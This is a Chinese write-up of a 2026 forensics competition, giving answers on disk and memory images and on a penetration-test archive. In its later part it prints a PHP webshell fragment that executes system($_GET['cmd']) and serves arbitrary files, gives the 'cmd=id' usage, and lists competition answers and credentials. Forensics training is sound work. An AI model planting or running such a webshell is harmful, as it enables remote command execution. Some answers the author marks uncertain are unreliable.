2026盘古石初赛-计算机取证(zzx)
1. 分析刘洋liuyang_pc.E01检材,提取磁盘镜像SHA1值的前6位?[答案格式:字母小写]
5bc418

2. 分析刘洋liuyang_pc.E01检材,计算机系统Build版本为?[答案格式:19000]
26100

3. 分析刘洋liuyang_pc.E01检材,计算机最后一次正常关机的时间为?UTC +0[答案格式:2025-05-06-09:00:00]
2026-04-20-16:25:35

utc+0,所以要-8小时
4. 分析刘洋liuyang_pc.E01检材,计算机网卡的MAC地址为?[答案格式:00-0B-00-A0-00-00]

5. 分析刘洋liuyang_pc.E01检材,分析机主是从那里下载的typora?[答案格式:阿里云]
蓝奏云

6. 分析刘洋liuyang_pc.E01检材,刘洋在2026-04-19 13:46:01(UTC +0)曾访问过百度云盘,请给云盘的打开密码?[答案格式:11aa]

7. 分析刘洋liuyang_pc.E01检材,请给出刘洋管理pve集群所用的端口号?[答案格式:8000]

8006
8. 分析刘洋liuyang_pc.E01检材,请给出刘洋登录理财网站所使用的密码?[答案格式:password]
admin123

9. 分析刘洋liuyang_pc.E01检材,请给出理财网站的IP地址?[答案格式:127.0.0.1]
192.168.0.70

来到host文件,能看到理财网站是由192.168.0.70本地映射的
ps:我是做完了服务器之后来复盘的这个,所以能直接知道是192.168.0.70
10. 分析刘洋liuyang_pc.E01检材,请给出计算机内Bitlocker加密分区恢复密钥的前6位?[答案格式:6位数字]
560615-577522-342881-216865-242561-312356-584837-421597
检材中是有内存镜像文件的,用efdd:先提取key,用内存镜像

输出成一个evk文件

然后再把计算机镜像放进去解密(用上面的密钥文件)(选中bitlocker加密分区)


这个时候就有bitlocker加密恢复密钥了
11. 分析刘洋liuyang_pc.E01检材,找出VC加密容器的密钥文件,给出该密钥文件的绝对路径?[答案格式:D:\ABC\123\测试.txt]
D:\BaiduNetdiskDownload\无标题.png
文件C:/Users/刘洋/Pictures/Screenshots/屏幕截图(2).png

看picture当中的图片这里有些1080的高度,转到这个图片,发现高只有680像素,所以宽高修复一下
发现是vc密钥文件
12. 接上题,该VC加密容器的密钥文件的图像高度是多少像素?[答案格式:1345]
1080
题目中应该加一个“原始”不容易错;上面能看得出来
13. 分析刘洋liuyang_pc.E01检材,请给出团队重要信息加密保存的软件名?[答案格式:abc123]
“C:\Users\刘洋\Downloads\1Password`1Password`.exe”

后面几题都是围绕这个来的
14. 分析刘洋liuyang_pc.E01检材,该软件的保险库文件名为什么?[答案格式:abc.abc]
“C:\Users\刘洋\Documents\1password`liuyang.opvault`”

15. 分析刘洋liuyang_pc.E01检材,该软件的保险库文件打开密码是什么?[答案格式:124@password]
liuyang@6419

在下载文件夹中有一个和加密软件同名的rar能看到相关加密逻辑
“C:\Users\刘洋\Documents\1password\liuyang.opvault”
把里面的js文件拿出来爆破

16. 分析刘洋liuyang_pc.E01检材,请给出用户刘洋的开机密码?[答案格式:p@ssw0rd123]
6yang@2o26

17. 分析刘洋liuyang_pc.E01检材,请给出pve服务器的管理密码?[答案格式:p@ssw0rd123]
admin123

18. 分析刘洋liuyang_pc.E01检材,找出计算机内的脚本加密工具,给出该加密工具的SHA1的前6位?[答案格式:字母小写]
7860dc719e0bd9fddc2eafd6708ecf204d744ae7

这里我们已经拿到两个vc的密码了,所以极有可能是双层容器(上面这张图片中pgscup的md5值是21题开始的那层容器)
在bitlocker加密分区中的这个3g的文件一眼vc容器

这个时候拿 
这个文件作为密钥文件+pim = 2026解密vc容器 能看到以下信息

能看到encrypt_tool.py

ps:做完服务器也能知道是这个文件
19. 分析刘洋liuyang_pc.E01检材,该脚本加密工具在进行脚本加密时,最后一层是进行什么操作?[答案格式:字符替换]
十六进制转换

20. 分析刘洋liuyang_pc.E01检材,请解密该脚本加密工具加密的文件database.php.obf,给出该文件内的数据库密码?[答案格式:p@ssw0rd123]
pgscup@o26
下面那个passwd是备份密码,别弄错了

21. 分析刘洋liuyang_pc.E01检材,找出刘洋计算机内的交易信息.rar,给出该文件的打开密码?[答案格式:p@ssw0rd123]
pgscup@9541


22. 分析刘洋liuyang_pc.E01检材,找出刘洋计算机内刘桂荣的sf/z号码?[答案格式:5106***071131(公众号过审/故打码)]

hyw,有三个…

正常情况出题不会有这个问题,出题人可能没看过
23. 分析刘洋ly-memdump.mem镜像,给出用户刘洋的NT哈希值?[答案格式:数字字母组合,字母小写]
876dfe7bd78730b7b0baaf451414de8e

24. 分析刘洋ly-memdump.mem镜像,给出1Password密码管理器的数据库文件名?[答案格式:123ABc.abc]
1Password10.sqlite

25. 分析刘洋ly-memdump.mem镜像,1Password在VeraCrypt启动后约多少分钟启动?[答案格式:123]
2


差不多2分钟
26. 分析黄志远PC.E01镜像,黄志远使用的ai agent的名称是什么?[答案格式:www]
hermes


27. 分析黄志远PC.E01镜像,黄志远使用的模型api后4位是什么?[答案格式:abcd]
api_key: sk-dfesagheoghjopghjihgioa

28. 请分析黄志远PC.E01镜像中的渗透.rar文件,分析黄志远PC.E01镜像,黄志远总共攻击了多少台主机?[答案格式:123]

直接搜索渗透 能搜出来渗透rar及其密码,解压渗透密码能发现几百张图片,这里参考了这篇文章
Montage+gaps拼图(详细)_montage拼图-CSDN博客
第一步:先把碎片整体铺开观察
直接逐张看 500 个碎片没有意义,先把它们铺成一张接触表,快速判断题目内容。
Linux 侧在你同步的目录下执行:
cd /mnt/hgfs/E/电子取证/2026盘古石初赛/渗透密码/渗透密码
montage patch_*.png -tile 25x20 -geometry +0+0 contact_25x20.png
得到的总览图如下:

白底面积过大,意味着很多碎片边缘代价会非常接近,直接拼会有大量歧义。
第二步:提取“信息量高”的碎片
为了避免被纯白块干扰,我先统计每张图的非白色像素数量,把信息量高的碎片单独拿出来看。
高信息碎片总览如下:

这一步的作用是确认:
- 主体人物确实集中在一部分碎片里
- 文字线索主要也集中在这些碎片里
- 题目不是随机彩图,而是“白底人物+文字”的结构图
第三步:判断拼图版式
虽然有 500 张碎片,但原始大图到底是:
20 x 25- 还是
25 x 20
需要实际试。
因为 gaps 默认更适合正方形拼块,我先把所有 30 x 41 的原图碎片缩放成 41 x 41 的方块版本:
from pathlib import Path
from PIL import Image
root = Path('.')
out = root / 'gaps_square_41'
out.mkdir(exist_ok=True)
for f in sorted(root.glob('patch_*.png')):
im = Image.open(f)
im = im.resize((41, 41), Image.BICUBIC)
im.save(out / f.name)
然后分别生成两种随机铺图:


第四步:低代数试跑,先判断哪种版式更合理
这里没有直接安装成系统命令,而是把 gaps 仓库拉到本地后,通过 PYTHONPATH 方式直接运行。原因是 Windows 本地 Python 3.13 下,按 pip install . 安装时会卡在 numpy==1.24 构建问题上,但源码直接运行没问题。
试跑命令如下:
$env:PYTHONPATH='C:\Users\jerry\AppData\Local\Temp\codex-gaps'
python -m gaps.cli run puzzle_20x25.png solved_20x25_g3_p60.png --size=41 --generations=3 --population=60
python -m gaps.cli run puzzle_25x20.png solved_25x20_g3_p60.png --size=41 --generations=3 --population=60
20 x 25 试跑结果:

25 x 20 试跑结果:

对比后可以看出:
25 x 20版式更接近正确结果- 人物五官、上身、衣摆连接更自然
- 左侧红字位置也更合理
所以后续固定使用 25 x 20。
第五步:提高代数继续求解
确定版式后,再提高代数和种群规模,让 gaps 在 25 x 20 上继续优化:
$env:PYTHONPATH='C:\Users\jerry\AppData\Local\Temp\codex-gaps'
python -m gaps.cli run puzzle_25x20.png solved_25x20_g10_p120.png --size=41 --generations=10 --population=120
得到的正方形求解结果如下:

这时主体人物已经基本成形:
- 头部与五官基本对齐
- 双手与武器位置明显正确
- 下半身衣摆已大体连续
但因为背景有太多纯白碎片,所以周围文字和边角区域仍存在错位。
第六步:把结果映射回原始长方形碎片
由于求解时用的是 41 x 41 的方块版本,所以最后还要把排好的顺序映射回原始 30 x 41 的碎片。
做法是:
- 按
gaps_square_41中每张方块图的内容计算哈希 - 在求解结果中按格切出每个
41 x 41小块 - 根据哈希找到对应原始
patch_xxx.png - 用原始
30 x 41图重新拼接
最终得到还原比例后的结果图:

这一版比方块图更适合观察文字,因为没有横向拉伸。
第七步:提取文字区域做进一步观察
为了确认图中线索,我又单独把红字区域裁出来放大:
左侧红字区域:

中部红字区域:

右侧红字区域:

目前比较清晰的文字线索是:
- 左侧可辨识出:
晚去杀鬼 - 中部还有一个:
今
拼出来能看到密码是“今晚去杀鬼”;解开之后能看到渗透测试报告

16台
29. 请分析黄志远PC.E01镜像中的渗透.rar文件,反编译exploit二进制文件发现其调用了setuid()、setgid()和system(“/bin/bash”),该程序的源文件编译前名称是什么?[答案格式:xxx.c]
exploit.c

就是渗透下的这个exploit
30. 请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 功能逻辑研判观察 file_shell.php 的源码,若攻击者请求 ?download=/etc/passwd,程序执行的核心函数是什么?[答案格式:func()]
readfile()

<?php
if(isset($_GET['downlofad'])) {
$file = $_GET['download'];
if(file_exists($file)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
readfile($file);
exit;
}
}
...
readfile() 是 PHP 专门用于文件下载的函数,它会直接读取文件内容并写入输出缓冲区,无需手动打开 / 关闭文件句柄,也不需要将整个文件加载到内存中。
31. 请分析黄志远PC.E01镜像中的渗透.rar文件,Nikto扫描结果发现通过发送超长斜杠序列可以探测目录列举漏洞,该漏洞对应的CVE编号是什么?[答案格式:CVE-XXXX-XXXX]
CVE-2002-1078

32. 请分析黄志远PC.E01镜像中的渗透.rar文件,SQLite 数据库结构分析在 users 表的定义中,id 字段使用了 AUTOINCREMENT。这意味着什么?[答案格式:SQL_KEYWORD]
AUTOINCREMENT

文件头里面有写(这道题的题目出的何意味…)
33. 请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 命令执行参数若要利用 file_shell.php 获取当前系统的用户权限,正确的 URL 参数构造是什么?[答案格式:cmd=xxx]
...
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
<form method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload">
</form>
<form method="get">
<input type="text" name="cmd" placeholder="Command">
<input type="submit" value="Execute">
</form>
参数名是 **cmd**,通过 GET 传递,**system()** 执行命令。获取当前用户:Linux: **cmd=id**
34. 请分析黄志远PC.E01镜像中的渗透.rar文件,API 端口风险判定8000端口运行的技术组件是什么?[答案格式:XxxYyy]
FastApi
“渗透\通讯录管理系统漏洞清单.md”

35. 请分析黄志远PC.E01镜像中的渗透.rar文件,数据库存储安全性评估users 表的密码存储存在什么安全隐患?[答案格式:CVE-XXXX-XXXX]
CVE-2026-0005

36. 请分析黄志远PC.E01镜像中的渗透.rar文件,文件上传漏洞利用条件利用 upload.php 上传漏洞后,攻击者利用 Webshell 前最关键的一步是什么?[答案格式:xxx/]
**uploads/**

37. 请分析黄志远PC.E01镜像中的渗透.rar文件,根据通讯录管理系统漏洞清单,CVE-2026-0003(无限制文件上传漏洞)的CVSS评分是多少?[答案格式:1.2]
8.8

38. 请分析黄志远PC.E01镜像中的渗透.rar文件,根据file_shell.php源码,文件上传功能使用哪个PHP函数将临时文件移动到目标路径?[答案格式:php_func]
**move_uploaded_file**

39. 请分析黄志远PC.E01镜像中的渗透.rar文件,Web 目录遍历隐患uploads/ 目录启用目录列表功能通常由哪个组件控制?[答案格式:apache_opt]
indexes

Apache 的 **Options Indexes** 指令控制目录列表功能
40. 请分析黄志远PC.E01镜像中的渗透.rar文件,敏感凭据深度关联在 address_book.db 中,管理员密码 Str0ngP@ssw0rd2026! 是什么角色?[答案格式:SQL_DEFAULT](暂无答案)

他问的是管理员密码,所以应该是admin(存疑)
41. 请分析黄志远PC.E01镜像中的渗透.rar文件,数据规模与风险评估遭受泄露的个人联系人信息条数大约为多少?[答案格式:12345]
15000

42. 请分析黄志远PC.E01镜像中的渗透.rar文件,系统运行权限分析Web服务器运行的用户身份是什么?[答案格式:xxx-xxx]
www-data

43. 请分析黄志远PC.E01镜像中的渗透.rar文件,命令行注入漏洞识别验证 tools.php 命令执行漏洞时,哪个命令返回了uid的值?[答案格式:cmd]
id 
44. 请分析黄志远PC.E01镜像中的渗透.rar文件,数据库物理路径获取攻击者通过 generate_data.php 得知数据库在服务器上的绝对物理路径是什么?[答案格式:/xxx/xxx/xxx.db]
/var/www/html/address_book.db

45. 请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 下载参数逻辑源码中通过设置哪个 Header 实现浏览器自动弹出下载框?[答案格式:Content-xxx]
Content-Disposition

46. 请分析黄志远PC.E01镜像中的渗透.rar文件,身份验证策略评估系统中存在的弱密码策略漏洞不包括哪项?[答案格式:user/pass]


admin/Str0ngP@ssw0rd2026! 是通过 generate_data.php 泄露出来的管理员凭据,不是“弱密码策略漏洞”条目中列出的默认弱口令项。因此按 user/pass 格式应填: admin/Str0ngP@ssw0rd2026!
47. 请分析黄志远PC.E01镜像中的渗透.rar文件,API 环境交互日志价值未授权访问8000端口日志接口,最可能导致哪类敏感信息泄露?[答案格式:/api/xxx]
http://192.168.61.135:8000/api/logs

48. 请分析黄志远PC.E01镜像中的渗透.rar文件,攻击路径逻辑推演攻击者获取持久访问权限的最典型方式是什么?[答案格式:xxx.php]
file_shell.php
结合报告信息和上面对该php的分析

49. 请分析黄志远PC.E01镜像中的渗透.rar文件,漏洞 CVE 编号识读被标识为未授权命令执行漏洞的虚拟CVE编号是什么?[答案格式:CVE-XXXX-XXXX]
CVE-2026-0002

50. 请分析黄志远PC.E01镜像中的渗透.rar文件,系统修复优先级研判24小时紧急加固中,哪项不属于立即修复级别?[答案格式:ABC]
WAF

51. 请分析黄志远PC.E01镜像中的渗透.rar文件,管理员凭据有效性验证利用管理员密码,攻击者在哪个页面时才能生效?[答案格式:xxx.php]
tools.php 
52. 请分析黄志远PC.E01镜像中的渗透.rar文件,本系统使用的后端数据库技术是什么?[答案格式:DB_name]
SQLite

53. 请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 目录处理逻辑文件上传功能中,源码将上传后的文件命名为什么?[答案格式:$_xxx]
$_FILES

54. 请分析黄志远PC.E01镜像中的渗透.rar文件,目标系统运行的 Apache 具体版本号是什么?[答案格式:x.x.xx]
2.4.66

55. 请分析黄志远PC.E01镜像中的渗透.rar文件,根据通讯录管理系统漏洞清单,CVE-2026-0001(敏感信息泄露漏洞)的CVSS评分是多少?[答案格式:1.2]

9.8
56. 请分析黄志远PC.E01镜像中的渗透.rar文件,攻击者最终获取了什么角色的权限?[答案格式:xxx-xxx]
www-data

吐槽:渗透rar部分主要会卡在渗透密码部分;然后后面出的题像ai出的,而且加了顺序混淆,部分题感觉是选择题改的
DAMO开发者矩阵,由阿里巴巴达摩院和中国互联网协会联合发起,致力于探讨最前沿的技术趋势与应用成果,搭建高质量的交流与分享平台,推动技术创新与产业应用链接,围绕“人工智能与新型计算”构建开放共享的开发者生态。
更多推荐



所有评论(0)